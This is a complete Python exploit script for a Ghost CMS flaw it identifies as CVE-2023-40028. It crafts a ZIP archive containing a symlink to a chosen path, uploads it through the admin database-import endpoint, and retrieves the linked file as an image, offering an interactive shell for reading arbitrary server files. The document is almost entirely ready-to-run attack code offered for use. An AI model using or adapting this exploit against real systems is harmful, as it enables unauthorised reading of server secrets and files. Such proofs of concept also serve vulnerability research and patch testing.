#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""This script is used to exploit CVE-2023-40028 (Symlink Upload to Arbitrary File Read in Ghost CMS).
"""

# Imports
from cmd import Cmd
import argparse
import io
import random
import requests
import string
import sys
import urllib.parse
import zipfile

# Disable SSL self-signed certificate warnings
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Constants
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
ENDC = "\033[0m"
ENCODING = "UTF-8"


class File_Terminal(Cmd):
    """This class provides a terminal prompt for file read attempts."""

    intro = "Welcome to the Ghost file-read shell. Type help or ? to list commands.\n"
    prompt = "file> "
    file = None

    def __init__(self, read_file_func):
        self.read_file = read_file_func
        super().__init__()

    def do_cat(self, file_path):
        """Retrieve file contents."""
        self.read_file(file_path)

    def do_exit(self, *args):
        """Exit the terminal."""
        return True

    default = do_cat


def read_file(file_to_read):
    # Upload files
    randchars = "".join(random.choices(string.ascii_letters + string.digits, k=13))
    zipfilename = f"{randchars}.zip"
    pngfilename = f"{randchars}.png"

    # Create zip
    zb = io.BytesIO()
    with zipfile.ZipFile(zb, mode="w", compression=zipfile.ZIP_STORED) as zf:
        info = zipfile.ZipInfo(f"content/images/{pngfilename}")
        info.create_system = 3  # Indicates a Unix system (required for symlinks)
        # Set the "symlink" file type and permissions
        info.external_attr = 0o120777 << 16  # Symlink file type + rwxrwxrwx permissions
        # Write the symlink to the ZIP
        zf.writestr(info, file_to_read)
    zb.seek(0)
    zipbytes = zb.read()

    # Upload zip
    r = session.post(url=args.url + "/ghost/api/v3/admin/db", files={"importfile": (zipfilename, zipbytes)}, timeout=timeout)
    if r.status_code != 200:
        print(f"{RED}Error: Archive upload failed: {r.status_code}{ENDC}")
        return

    # Read image
    r = session.get(url=args.url + f"/content/images/{pngfilename}", timeout=timeout)
    if r.status_code != 200:
        print(f"{RED}Error: File read failed: {r.status_code}{ENDC}")
        return

    file_contents = r.text
    print(file_contents)


if __name__ == "__main__":
    # Parse arguments
    parser = argparse.ArgumentParser(description="POC for CVE-2023-40028 (Symlink Upload to Arbitrary File Read in Ghost CMS)")
    parser.add_argument(
        "-t",
        "--url",
        required=True,
        help="Target Ghost CMS URL (e.g., http://target-ghost-cms)",
    )
    parser.add_argument("-f", "--file", type=str, required=False, help="File path to read")
    parser.add_argument("-u", "--username", required=False, help="Username for authentication")
    parser.add_argument("-p", "--password", required=False, help="Password for authentication")
    parser.add_argument("-c", "--cookie", required=False, help="Cookie for authentication")
    parser.add_argument("-x", "--proxy", type=str, required=False, help="HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)")
    parser.add_argument("--timeout", type=int, default=3, required=False, help="Request timeout")
    parser.add_argument(
        "-a",
        "--useragent",
        type=str,
        required=False,
        help="User agent to use when sending requests",
        default="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
    )
    args = parser.parse_args()

    # Input-checking
    if not args.url.startswith("http://") and not args.url.startswith("https://"):
        args.url = "http://" + args.url
    args.url = urllib.parse.urlparse(args.url).geturl().strip("/")
    if args.cookie:
        if args.username or args.password:
            print(f"{RED}Error: Provide either a cookie or a username/password pair, not both.{ENDC}")
            sys.exit(1)
    elif args.username or args.password:
        if not args.username or not args.password:
            print(f"{RED}Error: Both username and password must be provided together.{ENDC}")
            sys.exit(1)
    else:
        print(f"{RED}Error: You must provide either a cookie or a username/password pair.{ENDC}")
        sys.exit(1)
    args.username = args.username
    args.password = args.password
    timeout = args.timeout

    # Initialize session
    session = requests.session()
    session.verify = False
    session.headers.update({"User-Agent": args.useragent})
    if args.proxy:
        session.proxies.update({"http": args.proxy, "https": args.proxy})
    if args.cookie:
        session.cookies.update({"ghost-admin-api-session": args.cookie})

    # Create session
    if args.cookie:
        print(f"[*] Checking authentication (cookie) ...")
        r = session.get(url=args.url + "/ghost/api/v3/admin/session/", timeout=timeout)
        if r.status_code == 200:
            print(f"[+] Admin session is valid.")
        else:
            print(f"{RED}Error: Invalid cookie.{ENDC}")
            sys.exit(1)
    else:
        print(f"[*] Checking authentication (username/password) ...")
        data = {"username": args.username, "password": args.password}
        r = session.post(url=args.url + "/ghost/api/v3/admin/session/", json=data, timeout=timeout)
        args.cookie = r.cookies["ghost-admin-api-session"]
        if r.status_code == 201:
            print(f"[+] Admin session created successfully.")
            print()
        else:
            print(f"{RED}Error: Invalid username/password pair.{ENDC}")
            sys.exit(1)

    # Execute
    if args.file:
        read_file(args.file)
    else:
        File_Terminal(read_file).cmdloop()
